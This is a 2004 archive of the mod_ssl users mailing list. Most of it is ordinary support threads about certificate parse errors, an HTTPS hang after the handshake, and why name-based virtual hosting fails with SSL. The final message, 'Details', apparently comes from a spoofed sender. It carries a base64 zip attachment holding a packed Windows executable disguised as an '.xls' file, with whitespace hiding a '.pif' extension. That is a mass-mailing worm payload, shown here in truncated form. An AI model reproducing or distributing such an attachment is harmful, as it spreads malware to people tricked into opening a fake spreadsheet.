	for modssl-users-l@master.modssl.org; Mon, 16 Feb 2004 11:54:40 -0500
To: modssl-users-l@master.modssl.org
Subject: 
From: <>
Message-Id: 
Date: Mon, 16 Feb 2004 11:54:40 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - host10.root-name-server.net
X-AntiAbuse: Original Domain - master.modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - 


 

From orlando@tvcnet.com  Mon Feb 16 17:59:30 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from vs00.tvsecure.com (vs00.tvsecure.com [64.62.251.20])
	by master.modssl.org (Postfix) with SMTP id EA25DA893E
	for ; Mon, 16 Feb 2004 17:59:26 +0100 (CET)
Received: (qmail 12872 invoked from network); 16 Feb 2004 16:59:22 -0000
Received: from ppp-67-115-163-165.dialup.sktn01.pacbell.net (67.115.163.165)
  by vs00.tvsecure.com with SMTP; 16 Feb 2004 16:59:22 -0000
Date: Mon, 16 Feb 2004 08:58:56 -0800
From: "Orlando L. Castro" 
Reply-To: "Orlando L. Castro" 
Organization: TVCNet
X-Priority: 3 (Normal)
Message-ID: <1072828706.20040216085856@tvcnet.com>
Cc: modssl-users-l@master.modssl.org
Subject: Re:
In-Reply-To: 
References: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi ,



Monday, February 16, 2004, 8:54:40 AM, you wrote:


 



-- 
Best regards,
 Orlando  (TVCNet Engineering)   mailto:orlando@tvcnet.com


From owner-modssl-users@modssl.org  Wed Feb 18 12:37:37 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 08DEBA8943; Wed, 18 Feb 2004 12:37:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from solutionsinc.co.uk (mail.solutionsinc.co.uk [81.98.215.247])
	by master.modssl.org (Postfix) with ESMTP id 60F73A8938
	for ; Wed, 18 Feb 2004 12:37:24 +0100 (CET)
Received: from [80.5.91.122] (HELO [192.168.1.209])
  by solutionsinc.co.uk (CommuniGate Pro SMTP 4.1.8)
  with ESMTP id 9104541 for modssl-users@modssl.org; Wed, 18 Feb 2004 11:37:19 +0000
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Wed, 18 Feb 2004 11:37:17 +0000
Subject: Re: Setting up multiple SSL certs on a mac 10.3 server problems
From: Huw Jenkins 
To: 
Message-ID: 
In-Reply-To: <20040213073217.GB19372@serv01.aet.tu-cottbus.de>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Huw Jenkins 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



> From: Lutz Jaenicke 
> Organization: BTU Cottbus, Allgemeine Elektrotechnik
> Reply-To: modssl-users@modssl.org
> Date: Fri, 13 Feb 2004 08:32:17 +0100
> To: modssl-users@modssl.org
> Subject: Re: Setting up multiple SSL certs on a mac 10.3 server problems
> 
> On Thu, Feb 12, 2004 at 04:34:08PM +0000, Huw Jenkins wrote:
>> Hi there,
>> 
>> Having problems setting up multiple certs on a 10.3 box. I've got one
>> running on the machine yet I can't seem to get any of the others to work I
>> get this error message:
>> 
>> [Thu Feb 12 09:19:22 2004] [error] mod_ssl: Init:
>> (www.royalcaribbean.co.uk:16443) Ops, no RSA or DSA server
>> certificate found?!
>> [Thu Feb 12 09:19:22 2004] [error] mod_ssl: Init:
>> (www.royalcaribbean.co.uk:16443) You have to perform a
>> *full* server restart when you added or removed a
>> certificate and/or key file
>> [Thu Feb 12 09:19:28 2004] [error] mod_ssl: Init: Unable to
>> read server certificate from file
>> /etc/httpd/ssl.key/royal.crt (OpenSSL library error
>> follows)
>> [Thu Feb 12 09:19:28 2004] [error] OpenSSL:
>> error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
>> tag
>> [Thu Feb 12 09:19:28 2004] [error] OpenSSL:
>> error:0D07803A:asn1 encoding
>> routines:ASN1_ITEM_EX_D2I:nested asn1 error
>> [Thu Feb 12 09:19:34 2004] [error] mod_ssl: Init: Unable to
>> read server certificate from file
>> /etc/httpd/ssl.key/royal.crt (OpenSSL library error
>> follows)
>> [Thu Feb 12 09:19:34 2004] [error] OpenSSL:
>> error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
>> tag
>> [Thu Feb 12 09:19:34 2004] [error] OpenSSL:
>> error:0D07803A:asn1 encoding
>> routines:ASN1_ITEM_EX_D2I:nested asn1 error
>> 
>> 
>> I know the cert's are OK. Definitely! I've been getting new ones off
>> Geotrust (the techies there are really helpful!) and I've used everyway
>> under the sun to input them. Still won't work tho. So I'm thinking the
>> problem lies somewhere else! Anyone got any idea what could be going wrong?
> 
> The error message indicates, that the contents of the certificate cannot
> be correctly parsed. You should be able to verify this with the
> openssl command line tool:
> openssl x509 -in /etc/httpd/ssl.key/royal.crt -text
> If the certificate is ok, you should see its contents here. But as the
> tool is using the same routines as mod_ssl...
> 
> Best regards,
> Lutz

Having done this I've noticed that all the new files I have received from
GeoTrust have the same result. I'm assuming that they can't all be bad!
Therefore after many days of trying everything I must resort to the thought
that my mod_ssl version and apache version are not right. I personally
haven't updates either since I got another site working on that machine. But
at this stage I can't rule anything out. Just quickly, how do I find out
what version of apache and mod_ssl I'm running? I know that modssl.org will
tell me what I need to know with regard to what is compatible with what. I
just need to know what I'm running. Also does openssl have to be a correct
version? If so how do I find that out?

Any help would be gratefully received!

Regards

Huw

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 18 21:37:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 830C1A893E; Wed, 18 Feb 2004 21:37:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dpc.ucar.edu (flood.dpc.ucar.edu [128.117.126.208])
	by master.modssl.org (Postfix) with ESMTP id 176F1A8938
	for ; Wed, 18 Feb 2004 21:36:50 +0100 (CET)
Received: (from peterb@localhost)
	by dpc.ucar.edu (8.11.6/8.11.6) id i1IKajr10041
	for modssl-users@modssl.org; Wed, 18 Feb 2004 13:36:45 -0700
Date: Wed, 18 Feb 2004 13:36:45 -0700
From: Peter Burkholder 
To: modssl-users@modssl.org
Message-ID: <20040218133645.C7434@ucar.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Burkholder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have httpd 2.0.48 built from source.  It's been running fine for weeks but
this morning it stopped responding to HTTPS although it kept going okay with
HTTP.  In the hopes that it would go away forever, I simply did an=20
'httpd restart'.

A few hours later, Nagios told me that HTTPS connects were timing out again.
Damn.  Now I really do have a problem to fix.  I hope someone on the list
can help.

Packet tracing and ssldump indicate that clients are completing the TCP
handshake, but the server is mute after ClientHello:

SSLDUMP output:
---
New TCP connection #1: qaos(47914) <-> aegeanx.dpc.ucar.edu(443)
1 1  0.0458 (0.0458)  C>S  Handshake
      ClientHello
        Version 3.1=20
        cipher suites
        TLS_RSA_WITH_RC4_128_SHA
        TLS_RSA_WITH_RC4_128_MD5
        TLS_RSA_WITH_3DES_EDE_CBC_SHA
        compression methods
                  NULL
1 2  0.0754 (0.0296)  S>C  Handshake
      ServerHello
        Version 3.1=20
        session_id[32]=3D
          7b a5 2d ba 12 bb 11 55 1d ed 87 28 42 87 f5 e6=20
          a6 f9 9f d2 80 8d b9 d9 19 61 a2 72 19 d2 13 d5=20
        cipherSuite         TLS_RSA_WITH_RC4_128_SHA
        compressionMethod                   NULL
1 3  0.0754 (0.0000)  S>C  Handshake
      Certificate
1 4  0.0754 (0.0000)  S>C  Handshake
      ServerHelloDone
1 5  0.1014 (0.0259)  C>S  Handshake
      ClientKeyExchange
1 6  0.1414 (0.0400)  C>S  ChangeCipherSpec
1 7  0.1414 (0.0000)  C>S  Handshake
1 8  0.1513 (0.0098)  S>C  ChangeCipherSpec
1 9  0.1513 (0.0000)  S>C  Handshake
1 10 0.1547 (0.0034)  C>S  application_data
---
After this the server sends an ACK,  then nothing.

I've changed the SSLSessionCache from shmht to dbm, but am I simply wishing
in the hopes that'll change anything?

Thanks,

Peter


--
Peter Burkholder, System Administrator
Digital Library for Earth System Education (DLESE=C2=AE -- http://www.dlese=
.org)
peterb@ucar.edu
DLESE Program Center (DPC)                               ~~~  ~~  ~~~~   __o
UCAR/DPC, P.O. Box 3000       Ph) +1-303-497-2663      ~~~  ~~~~ ~~    _`\<=
,_
Boulder, CO 80307-3000        Fx) +1 303-497-8336 ~~~~ ~~~   ~~~~     (*)/ =
(*)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 19 21:37:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AA26FA897C; Thu, 19 Feb 2004 21:37:05 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from serv01.aet.tu-cottbus.de (serv01.aet.TU-Cottbus.De [141.43.132.161])
	by master.modssl.org (Postfix) with ESMTP id 417B8A8947
	for ; Thu, 19 Feb 2004 21:36:53 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id B06A929D9
	for ; Thu, 19 Feb 2004 21:12:58 +0100 (MET)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 08BC729D8; Thu, 19 Feb 2004 21:12:55 +0100 (MET)
Date: Thu, 19 Feb 2004 21:12:55 +0100
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: Setting up multiple SSL certs on a mac 10.3 server problems
Message-ID: <20040219201255.GC16058@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20040213073217.GB19372@serv01.aet.tu-cottbus.de> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
Organization: BTU Cottbus, Allgemeine Elektrotechnik
User-Agent: Mutt/1.5.4i
X-Virus-Scanned: by amavisd 0.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Feb 18, 2004 at 11:37:17AM +0000, Huw Jenkins wrote:
> >> I know the cert's are OK. Definitely! I've been getting new ones off
> >> Geotrust (the techies there are really helpful!) and I've used everyway
> >> under the sun to input them. Still won't work tho. So I'm thinking the
> >> problem lies somewhere else! Anyone got any idea what could be going wrong?
> > 
> > The error message indicates, that the contents of the certificate cannot
> > be correctly parsed. You should be able to verify this with the
> > openssl command line tool:
> > openssl x509 -in /etc/httpd/ssl.key/royal.crt -text
> > If the certificate is ok, you should see its contents here. But as the
> > tool is using the same routines as mod_ssl...
> > 
> > Best regards,
> > Lutz
> 
> Having done this I've noticed that all the new files I have received from
> GeoTrust have the same result. I'm assuming that they can't all be bad!
> Therefore after many days of trying everything I must resort to the thought
> that my mod_ssl version and apache version are not right. I personally
> haven't updates either since I got another site working on that machine. But
> at this stage I can't rule anything out. Just quickly, how do I find out
> what version of apache and mod_ssl I'm running? I know that modssl.org will
> tell me what I need to know with regard to what is compatible with what. I
> just need to know what I'm running. Also does openssl have to be a correct
> version? If so how do I find that out?

I am not completely sure that I understand your results. I assume that you
mean: "yes, openssl x509 .. also fails".
I am not familiar with MacOS X. Apache and mod_ssl (version to be found in
the logfile when starting) actually do call openssl's libraries for the
certificate handling, so the problem should be in the OpenSSL version
installed. (See "openssl version" for version information.)
The problem seems to be with the certificates which do carry public information,
so that you could post them so that other people can investigate
them and report.
Even better: if the problem can be reproduce with openssl alone, do post
your problem to the openssl-users@openssl.org mailing list.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 20 11:18:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6D2B4A8972; Fri, 20 Feb 2004 11:18:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from seldal.com (217-13-28-69.dd.nextgentel.com [217.13.28.69])
	by master.modssl.org (Postfix) with ESMTP id 95FD4A8938
	for ; Fri, 20 Feb 2004 11:18:11 +0100 (CET)
Received: from solidas.com [217.13.28.86] by seldal.com with ESMTP
  (SMTPD32-8.05) id AEE05B025C; Fri, 20 Feb 2004 11:18:08 +0100
Message-ID: <4035DEE2.7030900@solidas.com>
Date: Fri, 20 Feb 2004 11:18:10 +0100
From: "Svein E. Seldal" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6b) Gecko/20031208
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL and Virtual hosts
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Svein E. Seldal" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have this server that I'm going to run several virtualhosts. The
servers are for this example named test1, test2 and test3.

The server listens on two IP's: .10 and .11. Server test1 and test2
should listen on IP .10, and test3 on IP .11.

The server certificate for test1 and test3 presents the correct
certificate as it should. However, the server test2 certificate does
not. It presents the test1 certificate (probably because of the same use
of IP-address) instead of the correct test2 - which in turn makes the
clients pop up warning about the requestion because the certificate is
not issued to the correct name ("- The server's name 
"test2.mydomain.org" does not match the certificate's name 
"test1.mydomain.org". Somebody may be trying to eavesdrop on you.")

Is there a way to make it present the correct certificate for the
correct named server (on the same IP)?

I'm running Debian testing latest versions on a i686:
Server Version: Apache/1.3.29 Ben-SSL/1.52 (Debian GNU/Linux)
debian versions: apache-ssl  1.3.29.0.1-5

Regards,
Svein Seldal




Part of my httpd.conf:
----------------------

SSLDisable
SSLVerifyClient 2
....my other SSL settings....

Listen 192.168.0.10:443
Listen 192.168.0.11:443
NameVirtualHost 192.168.0.10:443
NameVirtualHost 192.168.0.11:443


ServerName test1.mydomain.org
SSLEnable
SSLRequireSSL
SSLCertificateFile /path/test1.crt
SSLCertificateKeyFile /path/test1.key
SSLCACertificateFile /path/test1_okaccess.crt
....other HTML definitions....




ServerName test2.mydomain.org
SSLEnable
SSLRequireSSL
SSLCertificateFile /path/test2.crt
SSLCertificateKeyFile /path/test2.key
SSLCACertificateFile /path/test2_okaccess.crt
....other HTML definitions....




ServerName test3.mydomain.org
SSLEnable
SSLRequireSSL
SSLCertificateFile /path/test3.crt
SSLCertificateKeyFile /path/test3.key
SSLCACertificateFile /path/test3_okaccess.crt
....other HTML definitions....



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 20 11:23:00 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 06B0CA89B8; Fri, 20 Feb 2004 11:22:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 4B906A8972
	for ; Fri, 20 Feb 2004 11:22:45 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id C86A75E0226; Fri, 20 Feb 2004 11:22:35 +0100 (CET)
Date: Fri, 20 Feb 2004 11:22:35 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSL and Virtual hosts
Message-ID: <20040220102235.GA26183@gw>
Mail-Followup-To: modssl-users@modssl.org
References: <4035DEE2.7030900@solidas.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <4035DEE2.7030900@solidas.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Feb 20, 2004 at 11:18:10AM +0100, Svein E. Seldal wrote:
> I'm running Debian testing latest versions on a i686:
> Server Version: Apache/1.3.29 Ben-SSL/1.52 (Debian GNU/Linux)
> debian versions: apache-ssl  1.3.29.0.1-5
> 
You're asking on the wrong list then - this is the mod_ssl list, while
you're running apache-ssl which lives at http://www.apache-ssl.org/

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 20 11:34:50 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 57681A8995; Fri, 20 Feb 2004 11:34:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 7DB5EA8938
	for ; Fri, 20 Feb 2004 11:34:33 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.10/8.12.10) with ESMTP id i1KAYUBN006940
	for ; Fri, 20 Feb 2004 11:34:30 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.10/8.12.10) with ESMTP id i1KAYTkm000795
	for ; Fri, 20 Feb 2004 11:34:29 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Subject: RE: SSL and Virtual hosts
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4927.1200
Date: Fri, 20 Feb 2004 11:34:28 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL and Virtual hosts
Thread-Index: AcP3m6e7zts1gVdHRtaSArHh64gsFgAAN7uw
Importance: normal
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Mads Toftum [mailto:mads@toftum.dk]
> > Server Version: Apache/1.3.29 Ben-SSL/1.52 (Debian GNU/Linux)
> > debian versions: apache-ssl  1.3.29.0.1-5
> >=20
> You're asking on the wrong list then - this is the mod_ssl list, while
> you're running apache-ssl which lives at http://www.apache-ssl.org/

Of course you're right, but since it's a Friday and since this is the
number one Frequently Made Mistake on SSL and since it applies equally
to apache-ssl, mod_ssl or any other implementation of SSL:

You are trying to do name-based virtual-hosting with SSL. You can't.
It's not an apache problem, it's a fundamental limitation of the HTTPS
protocol. See http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47 for the
mod_ssl explanation. Probably apache-ssl will have a similar FAQ.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.=20

>=20
> vh
>=20
> Mads Toftum
> --=20
> `Darn it, who spiked my coffee with water?!' - lwall
>=20
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
Diese E-mail ist eine private und pers=F6nliche Kommunikation. Sie hat
keinen Bezug zur B=F6rsen- bzw. Gesch=E4ftst=E4tigkeit der SWX Gruppe. =
This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Group. Le pr=E9sent e-mail =
est
un message priv=E9 et personnel, sans rapport avec l'activit=E9 =
boursi=E8re du
Groupe SWX.

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From zdenek.kafka@siemens.com  Tue Feb 24 12:53:11 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from siemens.com (228.149.62.81.dial.bluewin.ch [81.62.149.228])
	by master.modssl.org (Postfix) with ESMTP id D9671A8958
	for ; Tue, 24 Feb 2004 12:53:04 +0100 (CET)
From: zdenek.kafka@siemens.com
To: modssl-users-l@master.modssl.org
Subject: Details
Date: Tue, 24 Feb 2004 12:53:29 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0007_94D588AE.1C808A56"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20040224115304.D9671A8958@master.modssl.org>

This is a multi-part message in MIME format.

------=_NextPart_000_0007_94D588AE.1C808A56
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

OK


------=_NextPart_000_0007_94D588AE.1C808A56
Content-Type: application/octet-stream;
	name="tnbkykz.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="tnbkykz.zip"

UEsDBAoAAAAAAK5eWDDRGrdT7YcAAO2HAABUAAAAdG5ia3lrei54bHMgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAucGlm
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwAAAAAA
AAAAAAAAAADgAA8BCwEHAABwAAAAEAAAAGAAALDQAAAAcAAAAOAAAAAAUAAAEAAAAAIAAAQAAAAA
AAAABAAAAAAAAAAA8AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
AADo4QAAMAEAAADgAADoAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAABVUFgwAAAAAABgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgVVBYMQAAAAAA
cAAAAHAAAABkAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADgAAAABAAAAGgAAAAA
AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAMS4yNABVUFghDAkCCVOYi2gYbO9V4bUAAKFgAAAAmgAAJgQARO6H
opAAZDRQAFwDmqZpmlRMRDw0LGmapmkkHBQMBNM0zbL8M/Ts5NzrDjNN0MgAwAu4A6ZpmqawqKSc
lJqmaZqMhHx0bGDpmqZpWFBIQGM4p2mapjAoHBQMmqZZdgP4MvDs5OBim6Zp2MzAuDKL0zSd2X8y
A6CYkE3TNE2IgHhwbGg0TdM0YFhQTEDTNE3XOGcwKCQcO9k0TRQQBPwx9Afee5uu6APg2DGfm+c0
D53pkzEDlBMxMZquGcw3oJgDkIxsmqZpiIB4cBBH/3duswj8Ru8Dip1a0Nrl9AYfM07/////bHJO
2AKXX5LIAT18vkNLluQ1ieA6l/dawCmVBHbrY97/////XN1h6HL/jyK4Ue2MLtN7JtRNOfCqaThQ
vnnxHSuaK2////9vqzCsiqbMktjT8vvswsaWp7SHbnVDdxjF6YdROP////+rqpAcOY5bcvKAJv3f
QKEEV9tGtCWZEIoHhwqQGaWlqP////+ut8PS5PkRLEprj7bgDT1wpt8bWpzhKXTCE2e+GHXVOP//
//+eB3PiVMlBvDq7P8ZQ3W0Ali/LagyxWQSyYxfOiEUFyP/////eEiPyiJhyTCoL79bArZ2Qhn97
epyBh7WpssDe+DU1WP////9+t9MCNFmh3CoPn+YwPc0gdq8riuxRuVGSE3fuaOdl6P////9q94OD
hoyVobTC1+8KKEltlM7rG06Uvfk4er8HUKDxRf//G/+c9kOzFmzlUQu3H5oImR2kLrtLznQNqUjq
j/////834pBB9awGI+MabDUB0KJ3TyoI6c20not7bmRdWVhaX/////9ncoCRpQC28xM6XIWx4BJH
f7r4OX3EDlur/lStCWjKL/////+XAnDhVcxGw0PGTNVhYWRqc3+OoLXN6AYnS3KcyfksYv////+b
1xZYneUwfs8jetQxkfRawy+eEIX9ePZ3+4IMmXzsCv/////bhybIbRXwbh/TmkQBwYRKE9+qgFUt
CObHq5J8aVlMQv////87tzY43RAABl6DmrTR8TQ6Y4/+8CVdjtYXW6bsOYncMv////+L50aoDXXg
Tr9zqiRBdPRygT8/QkhRTWx+k8vG5AUrUP////96p80KQHm19DZ7ww5crQFYsk9v0vihDXzuY9tW
1FXZYP/////qdweaMMllBKZL855M/bFoIt+fYijxvYxeMwvmxKWJcP////9aRzcqIBkVFBYbIy48
TWF4kq/P8hhBbZzOAzt2tPU5gP/////KF2e6EGnFJIbrU74snRGIAn//ggiRHR0gJi87Slxxif8v
/P+kwuMHLliFtegeV5PSFMPsOovfNpDtTbAWf//////rWsxBuTSyM7c+yFXleA6nQ+KEKdF8KtuP
RgC9fUAGz/////+bajwR6cSig2dOOCUVCP738/L0+QEMGis/VnCNrdD2H/////9LeqzhGVSS0xde
qPVFmO5HowJkyTGcCnvvZuBd3WDmb//////7+/4EDRkoOk9ngqDB5Qw2Y5PG/DVxsPI3f8oYab0U
bv/////LK470Xck4qh+XEpARlRymM8NW7IUhwGIHr1oIuW0k3v////+bWx7krXlIGu/HooBhRSwW
A/Pm3NXR0NLX3+r4CR00Tv////9ri67U/SlYir/3MnCx9TyG0yN2zCWB4EKnD3roWc1Evv////87
uz7ETdnZ3OLr9wYYLUVgfp/D6hRBcaTaE0+O0BVdqP83/v/2R5vyTKkJbNI7pxaI/XUD73P6hBGh
NMpj//////+eQNSjCtKXHlLkWDX1wIK6SuK3YALhQEI59OH+0Lqzr/////+IsLWbzdY0JBwm2WmN
s2M2dyZiKu+xhJUJ9prSD+E13/////+V4WQFRFOV17cTShscn93xovZp5hQqCfTcwV6+H8yIWun/
pf+mMpJhpNgX8UO7syhCinsvIQSCTd7d////f5EQszKuJxJ/earEN6uTwZodMD6jGkRti18e5bpL
